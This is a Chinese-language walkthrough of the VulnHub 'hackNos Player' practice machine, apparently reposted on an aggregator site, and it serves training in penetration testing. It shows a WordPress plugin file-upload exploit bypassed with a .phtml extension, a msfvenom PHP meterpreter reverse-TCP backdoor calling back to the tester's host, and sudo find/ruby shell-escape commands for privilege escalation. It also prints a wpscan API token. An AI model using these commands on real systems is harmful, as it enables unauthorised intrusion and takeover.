欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

Vulnhub靶机:HACKNOS

时间:2023-06-28
目录

介绍信息收集

主机发现主机信息探测 网站探测

目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站 Getshell提权

sudo提权获取所有Flag 介绍

系列: hackNos(此系列共7台)
发布日期:2020年04月10日
难度:初级-中级
Flag : 1个,根用户的root.txt
学习:

wordpress 安全测试远程代码执行特权提升

靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/

信息收集 主机发现

arp-scan主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

主机信息探测 开放端口探测:nmap -p- 192.168.1.117,只开放了80和3306端口(快速确认开放端口) 对开放端口服务做进一步探测:nmap -p80,3306 -sV 192.168.1.117 使用默认的NSE脚本进行扫描:nmap -p3306 -sC 192.168.1.117

看到数据库版本是5.5.5

网站探测

访问80端口,没什么有价值的信息。

目录扫描

gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

没发现什么有价值的信息,换用之前的文章 HACLABS: NO_NAME 中的套路(换用大字典)的方式依然无效。木得办法,回过头来看看网站首页吧,能不能看到什么有价值的东西。发现了一个网站目录:“g@web”

由于需要加载google站点的api,打开速度略慢。耐心等待一会后看到了如下网站。通过插件得知网站是WordPress 5.3.11

wpscan列出站点的用户名、账号

wpscan --url http://192.168.1.117/g@web -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现了一条信息

打开网站,这个应该是个密码:hackNos@9012!!

尝试登录网站,失败

wpscan漏扫网站

wpscan --url http://192.168.1.117/g@web/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现远程代码执行漏洞!

打开根据提供的网址,看到了利用代码

复制下来,对url地址略作修改,得到:

After doing this, an uploaded file can be accessed at, say:http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

将其保存为本地的一个html文件,然后用浏览器打开它,如下图,是一个文件上传

这就好说了,一句话木马来了

Getshell

由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。

msf准备

生成后门msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php开启监听use exploit/multi/handlerset payload php/meterpreter/reverse_tcpset LHOST 192.168.1.118exploit

投递后门,失败了

看到提示,文件格式不支持!自己真是大意了,回过头在漏洞验证网站中得知,漏洞的成因为使用了switch case简单匹配了黑名单后缀导致可进行绕过,漏洞验证网站建议我们使用.phtml后缀绕过

修改后门后缀为.phtml,重新投递文件 访问后门

根据利用代码得知,上传的文件在:http://example.com/wp-content/uploads/wpsp

获取shell

鼠标单击文件,获取shell

提权

前面使用wpscan拿到了密码:**hackNos@9012!! **,依次尝试,得知是 **security **用户的

发现一个敏感文件,暂时没有访问权限

sudo提权 第一次sudo提权

提示可以通过用户hacknos进行find提权,而靶机上只有hackNos-boat、hunter、security三个用户,因此这里的用户hacknos指的应该是hackNos-boat

如下图,切换用户hacknos失败,切换hackNos-boat成功
通过网站 https://gtfobins.github.io/gtfobins/find/ 获知提权命令:

sudo -u hackNos-boat find 、-exec /bin/bash ; -quit

第二次sudo提权

继续尝试sudo提权,发现ruby提权,通过网站 https://gtfobins.github.io/gtfobins/ruby/ 得知提权命令:

sudo -u hunter ruby -e 'exec "/bin/sh"'

第三次sudo提权 获取所有Flag

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。